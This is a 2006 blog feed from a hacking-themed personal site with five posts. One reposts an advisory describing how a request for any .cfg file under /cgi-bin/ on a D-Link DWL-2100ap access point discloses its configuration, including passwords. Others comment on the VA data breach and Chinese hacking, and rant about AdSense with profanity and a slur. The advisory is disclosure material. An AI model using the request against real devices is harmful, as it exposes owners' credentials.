<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6687720</id><updated>2011-12-15T09:49:06.665+07:00</updated><title type='text'>Solpot Unofficial Site</title><subtitle type='html'>Hacking, Phreaking, Cracking, Shadowing, Tracing, Securing, Covering, Hunting, etc</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6687720.post-114978895282074171</id><published>2006-06-09T00:48:00.000+07:00</published><updated>2006-06-09T00:49:12.823+07:00</updated><title type='text'>D-Link Access-Point &lt;= 2.10na (DWL-2100ap) Config Disclosure Vuln</title><content type='html'># ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)&lt;br /&gt;# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY&lt;br /&gt;# http://www.intruders.com.br/ , http://www.intruders.org.br/&lt;br /&gt;&lt;br /&gt;Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).&lt;br /&gt;Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).&lt;br /&gt;However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration.&lt;br /&gt;&lt;br /&gt;For example, making the following request:&lt;br /&gt;&lt;br /&gt;http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg&lt;br /&gt;We would have a result equivalent to the following:&lt;br /&gt;&lt;br /&gt;# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved&lt;br /&gt;# DO NOT EDIT -- This configuration file is automatically generated&lt;br /&gt;magic Ar52xxAP&lt;br /&gt;fwc: 34&lt;br /&gt;login admin&lt;br /&gt;DHCPServer&lt;br /&gt;Eth_Acl&lt;br /&gt;nameaddr&lt;br /&gt;domainsuffix&lt;br /&gt;IP_Addr 10.0.0.30&lt;br /&gt;IP_Mask 255.0.0.0&lt;br /&gt;Gateway_Addr 10.0.0.1&lt;br /&gt;RADIUSaddr&lt;br /&gt;RADIUSport 1812&lt;br /&gt;RADIUSsecret&lt;br /&gt;password IntrudersTest&lt;br /&gt;passphrase&lt;br /&gt;wlan1 passphrase AnewBadPassPhrase&lt;br /&gt;# Several lines removed.&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2006-06-08]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6687720-114978895282074171?l=azwar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.milw0rm.com/exploits/1889' title='D-Link Access-Point &lt;= 2.10na (DWL-2100ap) Config Disclosure Vuln'/><link rel='replies' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/114978895282074171/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6687720&amp;postID=114978895282074171' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114978895282074171'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114978895282074171'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/2006/06/d-link-access-point-210na-dwl-2100ap.html' title='D-Link Access-Point &lt;= 2.10na (DWL-2100ap) Config Disclosure Vuln'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6687720.post-114977153940903832</id><published>2006-06-08T19:57:00.000+07:00</published><updated>2006-06-08T19:58:59.416+07:00</updated><title type='text'>26.5 million US veterans privacy at risk</title><content type='html'>We learned 15 days ago, from the &lt;a href="http://www.va.gov/" target="_blank"&gt;US Department of Veterans Affairs &lt;/a&gt; (VA) about the possible loss of privacy threat for 26.5 millions of American veterans. If your grandpa is one of them, you should warn him about the fact that somebody stolen his name, social security number, date of birth and evenutally his disability ratings.&lt;p&gt;Scared about this? Don't worry! The US DVA "has set up a manned call center that veterans may call to get information about this situation and learn more about consumer identity protections. The call center will operate from 8 am to 9 pm (EDT), Monday-Saturday as long as it is needed. The call center will be able to handle up to 20,000 calls per hour (260,000 calls per day)" [sic].&lt;/p&gt;&lt;p&gt;Fortunately we have the telecommunication technology on our side... but hey! Let us calculate: assuming that the call center will be really able to handle all of the 260,000 calls per day as promised, having 26,5 millions of worried people to answer to, it means that your grandpa has probably to spend his next 100 days to get through the call center. Calculating that maybe 30% of those veterans are more than 70 years old, it might be very possible that a few thousands of them will die with the telephone in their hand.&lt;/p&gt;&lt;p&gt;Don't you just love statistics? &lt;/p&gt;  &lt;p&gt;Always from the VA website we read: "the 235,000 VA employees are deeply saddened by any concern or anxiety this incident may cause our veterans and their families." . Seems that the Bush administration will soon have to face an out-of-the-badget request to purchase large quantity of Xanax. Conspiracy theory lovers are already thinking about dark menuevers behind &lt;a href="http://www.nyse.com/about/listed/lcddata.html?ticker=PFE" target="_blank"&gt;Pfizer stock market value&lt;/a&gt; ... &lt;br /&gt;&lt;/p&gt;&lt;p&gt;FROM THE VA WEBSITE: &lt;/p&gt;&lt;p&gt;The Department of Veterans Affairs (VA) has recently learned that an employee, a data analyst, took home electronic data from the VA, which he was not authorized to do. This behavior was in violation of our policies.  This data contained identifying information including names, social security numbers, and dates of birth for up to 26.5 million veterans and some spouses, as well as some disability ratings.  Importantly, the affected data did not include any of VA's electronic health records nor any financial information. The employee's home was burglarized and this data was stolen.  The employee has been placed on administrative leave pending the outcome of an investigation. &lt;/p&gt;     &lt;p&gt; Appropriate law enforcement agencies, including the FBI and the VA Inspector General's office, have launched full-scale investigations into this matter.  Authorities believe it is unlikely the perpetrators targeted the items because of any knowledge of the data contents. It is possible that they remain unaware of the information which they posses or of how to make use of it. However, out of an abundance of caution, the VA is taking all possible steps to protect and inform our veterans. &lt;/p&gt;     &lt;p&gt; The VA is working with members of Congress, the news media, veterans service organizations, and other government agencies to help ensure that those veterans and their families are aware of the situation and of the steps they may take to protect themselves from misuse of their personal information.  The VA will send out individual notification letters to veterans to every extent possible. Veterans can also go to &lt;a href="http://www.firstgov.gov/" title="FirstGov"&gt;www.firstgov.gov&lt;/a&gt; as well as &lt;a href="http://www.va.gov/opa/" title="VA Office of Public Affairs"&gt;www.va.gov/opa&lt;/a&gt; to get more information on this matter. The firstgov web site is being set to handle increased web traffic. Additionally, working with other government agencies, the VA has set up a manned call center that veterans may call to get information about this situation and learn more about consumer identity protections. That toll-free number is 1-800-FED INFO (333-4636). The call center will be open beginning today, and will operate from 8 am to 9 pm (EDT), Monday-Saturday as long as it is needed. The call center will be able to handle up to 20,000 calls per hour (260,000 calls per day). &lt;/p&gt;     &lt;p&gt; The Secretary of Veterans Affairs R. James Nicholson has briefed the Attorney General and the Chairman of the Federal Trade Commission, co-chairs of the President's Identity Theft Task Force.  Task Force members have already taken actions to protect the affected veterans, including working with the credit bureaus to help ensure that veterans receive the free credit report they are entitled to under the law. Additionally, the Task Force will meet today, 22 May 2006, to coordinate the comprehensive Federal response, recommend further ways to protect affected veterans, and increase safeguards to prevent the reoccurrence of such incidents. &lt;/p&gt;     &lt;p&gt; The VA's mission to serve and honor our nation's veterans is one we take very seriously and the 235,000 VA employees are deeply saddened by any concern or anxiety this incident may cause our veterans and their families.  We appreciate the service our veterans have given their country and we are working diligently to protect them from any harm as a result of this incident. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6687720-114977153940903832?l=azwar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.zone-h.org/content/view/4679/31' title='26.5 million US veterans privacy at risk'/><link rel='replies' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/114977153940903832/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6687720&amp;postID=114977153940903832' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114977153940903832'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114977153940903832'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/2006/06/265-million-us-veterans-privacy-at.html' title='26.5 million US veterans privacy at risk'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6687720.post-114974712298017589</id><published>2006-06-08T13:03:00.000+07:00</published><updated>2006-06-08T13:15:21.676+07:00</updated><title type='text'>China: Hackers and 0day Exploits; Prelude to attack?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.zone-h.org/content/view/4548/30"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.zone-h.org/images/stories/rooting-for-us.jpg" alt="Click for the original post" border="0" /&gt;&lt;/a&gt;The Department of Defense has stated in the past they are worried about China and the &lt;a style="color: rgb(255, 0, 0);" href="http://www.time.com/time/nation/article/0,8599,1098371,00.html" target="_blank"&gt;dedicated intrusions&lt;/a&gt; into thousands of computer systems throughout national infrastructure and private sector networks. Again in 2006 they have released a &lt;a href="http://www.defenselink.mil/pubs/pdfs/China%20Report%202006.pdf" target="_blank"&gt;report&lt;/a&gt;  that tries to assess the PLA's mechanism and game plan. The Chinese People's Liberation Army, DOD officials suggest, is the group responsible for this sustained assault and continued attacks.&lt;p&gt;These are not the typical attacks in a few different ways than traditional techniques, in that they differed in both the method of attack and the type of information that was gathered...&lt;/p&gt;  &lt;p&gt;Let us put aside the method of attack for a moment and let us look at the goal. Just like a bank robbery, the goal is not only to get the money, but to get the money and yourself out safely. Obviously seeing a robber carrying sacks of money out of the vault is easy to spot, and so is electronic transactions by traditional means, in that both require the thief to transport something.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;The PLA took a different approach to traditional means of targeting systems and capturing and transferring data it found. Also by targeting government subcontractors and smaller niche companies to gather information from much less monitored and secured systems, the success of these attacks was unprecedented.&lt;br /&gt;&lt;br /&gt;Here we hypothesize two of the mechanisms that allowed them to do so with impunity:&lt;br /&gt;&lt;br /&gt;Method of Attack: The 0day factor&lt;br /&gt;&lt;br /&gt;0day exploits seem to be the favored choice for the majority of these successful attacks.  Going back to May 2004, news was announced that the Cisco IOS source code has been &lt;a href="http://news.com.com/Cisco+investigates+source+code+leak/2100-7349_3-5213724.html?tag=nl" target="_blank"&gt;purloined&lt;/a&gt; as well as August 2004, a new Malware called MyFip.a virus discovered.November 2004 USDOD reports mass hacking from Chinese based  &lt;a href="http://www.time.com/time/nation/article/0,8599,1098371,00.html" target="_blank"&gt;systems&lt;/a&gt;. Coincidentaly Cisco's PIX source code was being &lt;a href="http://www.eweek.com/article2/0,1895,1710415,00.asp" target="_blank"&gt;offered by hackers&lt;/a&gt; in the same month.Forward to July 2005, Michael Lynn of ISS discloses security flaws in Cisco routers. Claiming to have stumbled upon a Chinese forum discussing and using a flaw attributed to Cisco routers (and for which he was promptly prevented from speaking about). Now in 2006 researchers discover a 0day Microsoft Word exploit being used in very targeted attacks, again the info gathered by these attacks is being sent to the far east.Info Gathering: The new malware&lt;/p&gt;&lt;p&gt;They designed a new type of &lt;a href="http://www.lurhq.com/myfip.html" target="_blank"&gt;malware&lt;/a&gt; that searched for documents and files for software applications that are most likely to be used in the design of things, such as:Adobe PDF, Microsoft Word, AutoCAD, CirCAD circut design files and Microsoft Database files to name a few. Both of these techniques allowed the PLA to compromise systems and peruse data at will, as detection of these methods was not known at the time of the attacks.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6687720-114974712298017589?l=azwar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/114974712298017589/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6687720&amp;postID=114974712298017589' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114974712298017589'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114974712298017589'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/2006/06/china-hackers-and-0day-exploits.html' title='China: Hackers and 0day Exploits; Prelude to attack?'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6687720.post-114949272225985202</id><published>2006-06-05T14:30:00.000+07:00</published><updated>2006-06-05T14:32:02.260+07:00</updated><title type='text'>Adsense Sucks!</title><content type='html'>Again, AdSense driving me crazy. Im so fucked up. There are many ways to go to Roma, also there are so many ways to be rich. Right, I wanna be rich... I wanna be rich as well. No one but myself can find the best and the fastest way to be rich. So which way will I choose? I can either take the right way but slowly and I need more effort to realize it. Or I take the fastest, simple way to earn money but I don't be sure whether it's good for me in the long-term or not. Maybe I'll take the second and be rich as fast as the jetplane runs? If so I'll not forgive myself and I'll be the only dude that will be screwed up in his young ages.. poor Netmasked heh.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6687720-114949272225985202?l=azwar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='https://www.google.com/adsense/' title='Adsense Sucks!'/><link rel='replies' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/114949272225985202/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6687720&amp;postID=114949272225985202' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114949272225985202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114949272225985202'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/2006/06/adsense-sucks.html' title='Adsense Sucks!'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6687720.post-114949253168030099</id><published>2006-06-05T14:26:00.000+07:00</published><updated>2006-06-05T14:28:51.680+07:00</updated><title type='text'>Finally, it's now gone online! again.</title><content type='html'>I'm bored as fuck when I create this blog. Dunno why, just feel like in a "badsense" mood. Okay, lets talk about Google adsense. Yeah just hours ago, I talked with my friend, Indra, we were talking bout some topics, especially were arguing bout Google adsense thingie that has screwed me up. Why the fuck Google deleted my friend Google adsense account? We've earned bout $270 and will be more and more. Yea, even people as stupid as me can earn money from the adsense program (my script is like smarter than Google adsense for sure *joking mode set on*).&lt;br /&gt;But at least I realised that I made a great mistake with that stuff. Haha this story will be continued in later posts. And keep in mind that I'll find you whereever you are.....fags!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6687720-114949253168030099?l=azwar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://azwar.blogspot.com/feeds/114949253168030099/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6687720&amp;postID=114949253168030099' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114949253168030099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6687720/posts/default/114949253168030099'/><link rel='alternate' type='text/html' href='http://azwar.blogspot.com/2006/06/finally-its-now-gone-online-again.html' title='Finally, it&apos;s now gone online! again.'/><author><name>madkid</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
